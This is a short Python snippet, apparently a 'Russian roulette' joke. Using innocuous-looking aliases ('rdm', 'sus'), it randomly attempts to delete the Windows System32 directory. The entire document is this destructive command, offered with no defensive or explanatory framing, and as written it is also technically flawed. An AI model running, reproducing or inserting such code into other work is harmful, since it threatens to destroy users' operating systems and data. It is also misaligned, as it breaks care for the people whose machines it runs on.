```py from random import randint as rdm from os import remove as sus if rdm(0, 6) == 1: sus("C:\Windows\System32") ```